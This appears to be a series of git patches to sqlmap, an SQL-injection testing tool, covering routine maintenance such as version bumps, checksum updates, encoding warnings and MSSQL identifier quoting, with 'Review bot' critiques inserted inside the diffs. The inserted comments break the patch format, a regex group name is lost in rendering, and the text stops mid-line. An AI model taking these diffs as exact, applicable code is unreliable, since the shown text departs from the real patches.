From 439f8247b6fd0dad3c9e76cb9ea32c97d5a5b89e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 2 Jan 2018 01:08:47 +0100 Subject: [PATCH 001/428] Revert of version string --- extra/shutils/precommit-hook.sh | 30 +++++++++++++++--------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 17 insertions(+), 17 deletions(-) diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh index c859236db51..3c2137ce239 100755 --- a/extra/shutils/precommit-hook.sh +++ b/extra/shutils/precommit-hook.sh 
@@ -12,21 +12,21 @@ CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 -# if [ -f $SETTINGS_FULLPATH ] -# then -# LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') -# declare -a LINE -# INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") -# if [ -n "$INCREMENTED" ] -# then -# sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH -# echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" -# else -# echo "Something went wrong in VERSION increment" -# exit 1 -# fi -# git add "$SETTINGS_FULLPATH" -# fi +if [ -f $SETTINGS_FULLPATH ] +then + LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE") + if [ -n "$INCREMENTED" ] + then + sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH + echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}" + else + echo "Something went wrong in VERSION increment" + exit 1 + fi + git add "$SETTINGS_FULLPATH" +fi truncate -s 0 "$CHECKSUM_FULLPATH" cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done diff --git a/lib/core/settings.py b/lib/core/settings.py index 1d14dbc3064..2b940310793 100644 --- a/lib/core/settings.py 
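Review bot: The re-enabled block quotes `$SETTINGS_FULLPATH` only on the `git add` line; `[ -f $SETTINGS_FULLPATH ]`, `grep -o ${SETTINGS_FULLPATH} ...` and `sed -i ... $SETTINGS_FULLPATH` should quote it the same way (`"$SETTINGS_FULLPATH"`) so a checkout path with spaces does not word-split. `declare -a LINE` right after the scalar assignment appears to have no effect on how `$LINE` is used afterwards and looks like a leftover that can go. The `python -c` one-liner uses the `print` statement and so only runs under Python 2; since this hook executes on each committer's machine, a one-line comment stating that requirement (or `python2` explicitly) would save a confusing failure. The hook script continues outside the hunk.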
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2"
+VERSION = "1.2.1.5"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 56fec0b03d3..41e37c28d6a 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-e5967d7d5119cf82bb78949a40fa0486 lib/core/settings.py
+4fcb7ad3d64d8b8d7874c8097a1102e9 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
From e0dee9418d4cefdeca7ac79d7c43fbf5fad5648b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Mon, 8 Jan 2018 01:21:29 +0100
Subject: [PATCH 002/428] Fixes #2866
---
 lib/core/common.py | 2 +-
 lib/core/settings.py | 2 +-
 txt/checksum.md5 | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index 3024e373e46..e129d77609e 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -868,7 +868,7 @@ def boldifyMessage(message):
 def setColor(message, bold=False):
     retVal = message
-    level = extractRegexResult(r"\[(?P[A-Z ]+)\]", message) or kb.get("stickyLevel")
+    level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_ for _ in dir(logging) if _ == _.upper()), message) or kb.get("stickyLevel")
     if message and getattr(LOGGER_HANDLER, "is_tty", False):  # colorizing handler
         if bold:
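Review bot: The alternation built from `dir(logging)` is recomputed on every setColor call, and setColor runs for every log line; hoist it once at module level, e.g. `LOGGING_LEVEL_NAMES = '|'.join(_ for _ in dir(logging) if _ == _.upper())`, and keep the same named-group pattern with `% LOGGING_LEVEL_NAMES` (the group's name appears to have been dropped by the rendering of this page, so it is not quoted here). The new pattern also narrows what counts as a level: a custom level registered only through `logging.addLevelName`, with no matching module attribute, would have matched `[A-Z ]+` but no longer matches — worth confirming against the project's own levels before merging. setColor continues outside the hunk.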
diff --git a/lib/core/settings.py b/lib/core/settings.py index 2b940310793..f5f1c6988b8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.5" +VERSION = "1.2.1.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 41e37c28d6a..a6cf9f4dfaa 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -787f1b610fec311c8ed26a1a36993fae lib/core/common.py +e77e4b8164602351d7e7a0fd96db30f8 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4fcb7ad3d64d8b8d7874c8097a1102e9 lib/core/settings.py +a7506d334169334f86955e6016e2b6ab lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From f6738adc04e2c3c9a309f1b5a0773152e0460c46 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 12 Jan 2018 16:17:57 +0100 Subject: [PATCH 003/428] Abracadabra #2790 --- lib/core/settings.py | 2 +- thirdparty/colorama/ansitowin32.py | 12 +++++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f5f1c6988b8..8c8562cb390 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.6" +VERSION = "1.2.1.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/colorama/ansitowin32.py b/thirdparty/colorama/ansitowin32.py index b7ff6f2136e..e2a43a54499 100644 --- a/thirdparty/colorama/ansitowin32.py +++ b/thirdparty/colorama/ansitowin32.py @@ -171,9 +171,19 @@ def write_and_convert(self, text): def write_plain_text(self, text, start, end): if start < end: - self.wrapped.write(text[start:end]) + self._write(text[start:end]) self.wrapped.flush() + # Reference: https://github.com/robotframework/robotframework/commit/828c67695d85519e4435c556c43ed1b00985df05 + # Workaround for Windows 10 console bug: + # https://github.com/robotframework/robotframework/issues/2709 + def _write(self, text, retry=5): + try: + self.wrapped.write(text) + except IOError, err: + if not (err.errno == 0 and retry > 0): + raise + self._write(text, retry-1) def convert_ansi(self, paramstring, command): if self.convert: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a6cf9f4dfaa..cddf0f3ba9b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a7506d334169334f86955e6016e2b6ab lib/core/settings.py +f0a078744355f8eba214f960c810cdf9 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -328,7 +328,7 @@ bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py 658da0466b798cc70f48f35fe49b7813 thirdparty/clientform/clientform.py 722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py 0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py -e52252bb81ce1a14b7245b53af33e75f thirdparty/colorama/ansitowin32.py +93bb7f06c8300a91b533ea55e8aead43 thirdparty/colorama/ansitowin32.py ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py From a59198d1e4ba6de3a4b9cce64ac1830e24575eb2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 09:48:07 +0100 Subject: [PATCH 004/428] Minor just in case patch (to prevent junk reports) --- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8c8562cb390..cd950f3497e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.1.7"
+VERSION = "1.2.1.8"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/request/basic.py b/lib/request/basic.py
index c2fc73d31a8..d0d6d0bbb7c 100644
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -218,7 +218,7 @@ def checkCharEncoding(encoding, warn=True):
     try:
         codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
     except (LookupError, ValueError):
-        if warn:
+        if warn and ' ' not in encoding:
             warnMsg = "unknown web page charset '%s'. " % encoding
             warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS
             singleTimeLogMessage(warnMsg, logging.WARN, encoding)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index cddf0f3ba9b..aa5f40b9526 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-f0a078744355f8eba214f960c810cdf9 lib/core/settings.py
+cb8195e0a49997deb60e00e9abb6e5bc lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
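Review bot: `' ' not in encoding` filters exactly one kind of junk; `encoding` is taken from the web page under test, so a charset value carrying quotes, newlines or control characters still goes verbatim into `warnMsg` and into the "please report" prompt. A positive check against the shape of a charset name is tighter and covers the space case too, e.g. `if warn and re.match(r"\A[\w.:\-]+\Z", encoding):` (assuming `re` is already imported in this module). checkCharEncoding continues outside the hunk, so what the function returns for an unknown charset is not visible here.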
@@ -66,7 +66,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 307d4001682f38dd574548d98c0f1c3e lib/parse/payloads.py 38563853a32dd677ce6c65a0945d7227 lib/parse/sitemap.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py -054a83429e2538293175d6a7242f2e63 lib/request/basic.py +eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py a38e09038468387b20e978ce1b885018 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From e5ab678db0fab1b1e6830caf25e02f3938264ee6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 13:43:50 +0100 Subject: [PATCH 005/428] Fixes #2856 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index e129d77609e..ad2d46c4352 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4186,7 +4186,7 @@ def _(value): except UnicodeDecodeError: pass if not isinstance(retVal, unicode): - retVal = getUnicode(retVal, "utf8") + retVal = getUnicode(retVal, conf.encoding or "utf8") return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index cd950f3497e..de102bdec2d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.8" +VERSION = "1.2.1.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aa5f40b9526..5583a0e7590 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -e77e4b8164602351d7e7a0fd96db30f8 lib/core/common.py +11ecba8ab05ea12e5ac4f502a437eccf lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cb8195e0a49997deb60e00e9abb6e5bc lib/core/settings.py +fade730caa296418caad4448c378b5f2 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 18626656ec2dca54e1f60b0331fd6ad004f50944 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 13:53:46 +0100 Subject: [PATCH 006/428] Minor patch --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index be4c321b757..13b1103d4ef 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2584,9 +2584,9 @@ def _basicOptionValidation(): if conf.encoding: _ = checkCharEncoding(conf.encoding, False) if _ is None: - errMsg = "unknown charset '%s'. Please visit " % conf.encoding + errMsg = "unknown encoding '%s'. Please visit " % conf.encoding errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE - errMsg += "supported charsets" + errMsg += "supported encodings" raise SqlmapSyntaxException(errMsg) else: conf.encoding = _ 
diff --git a/lib/core/settings.py b/lib/core/settings.py index de102bdec2d..2a591a1c809 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.9" +VERSION = "1.2.1.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5583a0e7590..52143a3de78 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -8ca14b6faf28d2e5a2703ed5e7d6cce2 lib/core/option.py +ac01954e9881b5ba6e41b85e6c08bd9a lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fade730caa296418caad4448c378b5f2 lib/core/settings.py +e90193e32f636c09e0e668e3f550bcc9 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 94c170d39226d8551f0aa0298daec8ecd006f846 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 15 Jan 2018 14:04:41 +0100 Subject: [PATCH 007/428] Minor refactoring --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index ad2d46c4352..55be08d136e 100644 --- a/lib/core/common.py 
+++ b/lib/core/common.py
@@ -1400,9 +1400,9 @@ def parseTargetUrl():
     if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I):
         if ":443/" in conf.url:
-            conf.url = "https://" + conf.url
+            conf.url = "https://%s" % conf.url
         else:
-            conf.url = "http://" + conf.url
+            conf.url = "http://%s" % conf.url
     if kb.customInjectionMark in conf.url:
         conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 2a591a1c809..dac6c06eede 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.1.10"
+VERSION = "1.2.1.11"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 52143a3de78..bf41cbaba8b 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
 e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py
 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py
-11ecba8ab05ea12e5ac4f502a437eccf lib/core/common.py
+85de1b2ef240f740478841185f0743c2 lib/core/common.py
 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py
 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
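Review bot: The rewritten branches still hang on the `":443/" in conf.url` test on the context line above them, which matches that substring anywhere in the user-supplied URL (a path segment or query value), not only in the authority part, so the scheme can be guessed wrong. Deciding on the parsed port instead would be precise, e.g. `if urlparse.urlsplit("//%s" % conf.url).port == 443:` if `urlparse` is available in this module as it appears to be elsewhere in sqlmap — not visible from this hunk. The `%`-formatting change itself is behavior-neutral. parseTargetUrl continues outside the hunk.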
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e90193e32f636c09e0e668e3f550bcc9 lib/core/settings.py +9f41a4088761dda067b7575f0cd4a7eb lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From cea9d1c75e9c7600a1c4d492595c2691ca3ff58b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 21 Jan 2018 11:11:20 +0100 Subject: [PATCH 008/428] Patch related to the #2890 --- lib/core/common.py | 10 +++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 55be08d136e..06a4799bd8c 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3562,7 +3562,7 @@ def safeSQLIdentificatorNaming(name, isTable=False): _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) if _: - retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "", retVal) + retVal = re.sub(r"(?i)\A\[?%s\]?\." % DEFAULT_MSSQL_SCHEMA, "%s." % DEFAULT_MSSQL_SCHEMA, retVal) if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal) retVal = unsafeSQLIdentificatorNaming(retVal) 
@@ -3573,8 +3573,12 @@ def safeSQLIdentificatorNaming(name, isTable=False):
             retVal = "\"%s\"" % retVal
         elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
             retVal = "\"%s\"" % retVal.upper()
-        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
-            retVal = "[%s]" % retVal
+        elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+            parts = retVal.split('.', 1)
+            for i in xrange(len(parts)):
+                if ((parts[i] or " ")[0].isdigit() or not re.match(r"\A\w+\Z", parts[i], re.U)):
+                    parts[i] = "[%s]" % parts[i]
+            retVal = '.'.join(parts)
     if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
         retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index dac6c06eede..3a55b5cbb08 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.1.11"
+VERSION = "1.2.1.12"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index bf41cbaba8b..9db49e57a42 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py
 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
 e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py
 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py
-85de1b2ef240f740478841185f0743c2 lib/core/common.py
+8bfcc9511c4956ad22b62aa2c8f6386e lib/core/common.py
 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py
 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
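Review bot: `parts[i] = "[%s]" % parts[i]` brackets an identifier without escaping a `]` that the identifier itself contains, and the `re.match(r"\A\w+\Z", ...)` guard just above routes exactly such names into this branch, so a part holding `]` yields an unbalanced bracketed identifier. In T-SQL a literal `]` inside a bracketed name is doubled, so the line should read `parts[i] = "[%s]" % parts[i].replace("]", "]]")`. The same consideration applies to the schema-normalising `re.sub` in the preceding hunk, where `DEFAULT_MSSQL_SCHEMA` is interpolated into a pattern without `re.escape` — harmless for a plain name, but cheap to make explicit. safeSQLIdentificatorNaming begins and ends outside the hunk.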
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9f41a4088761dda067b7575f0cd4a7eb lib/core/settings.py +1887ce5c0983ffbeda639e3110a54521 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 4b9613e3629584da8bdac6c99a6590ae7879778e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 21 Jan 2018 11:49:50 +0100 Subject: [PATCH 009/428] Trivial update --- lib/core/settings.py | 2 +- lib/core/update.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3a55b5cbb08..114dc92ec5b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.12" +VERSION = "1.2.1.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index 5544fdbf3d0..fee57e8e41e 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -32,7 +32,7 @@ def update(): errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" logger.error(errMsg) else: - infoMsg = "updating sqlmap to the latest development version from the " + infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 